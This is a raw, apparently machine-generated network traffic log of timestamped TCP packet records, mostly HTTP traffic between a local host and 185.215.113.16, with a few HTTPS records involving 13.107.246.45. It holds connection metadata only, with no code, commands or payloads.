                                                                                                                                                                      Nov 21, 2024 06:23:38.049083948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.049127102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.050071001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.050158978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.050201893 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.051203966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.051282883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.051321030 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.052233934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.052321911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.052372932 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.053333044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.053436995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.053488016 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.054428101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.054542065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.054588079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.055488110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.055587053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.055630922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.056560040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.056674957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.056720018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.057651043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.057769060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.057811022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.058729887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.058852911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.058897972 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.059825897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.059937000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.059986115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.060931921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.061036110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.061085939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.062002897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.062103033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.062146902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.063086033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.063189983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.063236952 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.064172983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.064282894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.064330101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.065213919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.065340996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.065442085 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.066334009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.066445112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.066498041 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.067404985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.067511082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.067563057 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.068495035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.068607092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.068660975 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.069571972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.069673061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.069722891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.070662022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.070761919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.070815086 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.071734905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.071846008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.071893930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.072834015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.072951078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.073003054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.073977947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.074100971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.074152946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.075001001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.075118065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.075166941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.076091051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.076221943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.076280117 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.077187061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.077295065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.077347040 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.078258038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.118448973 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.196357965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.196427107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.196523905 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.196832895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.197072029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.197124958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.197140932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.198121071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.198177099 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.198235989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.199232101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.199284077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.199333906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.200299025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.200347900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.200390100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.201404095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.201455116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.201498032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.202461004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.202510118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.206826925 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.206898928 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.207128048 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:38.207180023 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:38.207201958 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.207220078 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:38.207226992 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.210825920 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:38.210865021 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.210962057 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:38.211211920 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:38.211235046 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.220805883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.220854998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.220909119 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.221299887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.221411943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.221460104 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.222363949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.222558975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.222609997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.223476887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.223598003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.223647118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.224560022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.224661112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.224709988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.225617886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.225733995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.225786924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.226699114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.226824045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.226871014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.227811098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.227904081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.227978945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.228861094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.228986025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.229038000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.229985952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.230084896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.230134010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.231076002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.231093884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.231147051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.232187033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.232208014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.232265949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.233290911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.233310938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.233357906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.234396935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.234416962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.234469891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.235476971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.235538960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.235589027 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.236501932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.236537933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.236583948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.237572908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.237679958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.237737894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.238652945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.238744020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.238791943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.239734888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.239896059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.239943981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.240899086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.240957975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.241005898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.241919994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.241993904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.242044926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.242957115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.243097067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.243159056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.244091988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.244129896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.244179964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.245198011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.245287895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.245337963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.246254921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.246336937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.246382952 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.247370005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.247442007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.247489929 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.248383999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.248506069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.248553991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.249481916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.249602079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.249651909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.250570059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.250693083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.251652956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.251703024 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.251761913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.251808882 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.252736092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.252867937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.252954960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.253810883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.253926992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.254004955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.254914045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.255036116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.255148888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.255999088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.256100893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.256279945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.257071972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.257198095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.257256031 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.258172035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.258266926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.258313894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.259299994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.259402990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.260036945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.260323048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.260436058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.260484934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.261408091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.261514902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.261584044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.262525082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.262626886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.262672901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.263598919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.263700008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.263745070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.264673948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.264759064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.264816999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.265760899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.265935898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.265978098 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.266863108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.266957045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.267878056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.267916918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.268022060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.268996000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.269046068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.269136906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.269186974 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.270067930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.321603060 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.388370037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.388433933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.388664961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.388834953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.389113903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.389167070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.389214993 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.390151024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.390199900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.390285015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.391235113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.391366005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.391412020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.392313957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.392368078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.392474890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.393409967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.393510103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.393565893 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.394552946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.395888090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.412662983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.412770987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.412827015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.413211107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.413285017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.413664103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.414326906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.414396048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.414437056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.415370941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.415445089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.415525913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.416449070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.416564941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.416623116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.417541981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.417586088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.417643070 CET4976280192.168.2.6185.215.113.16
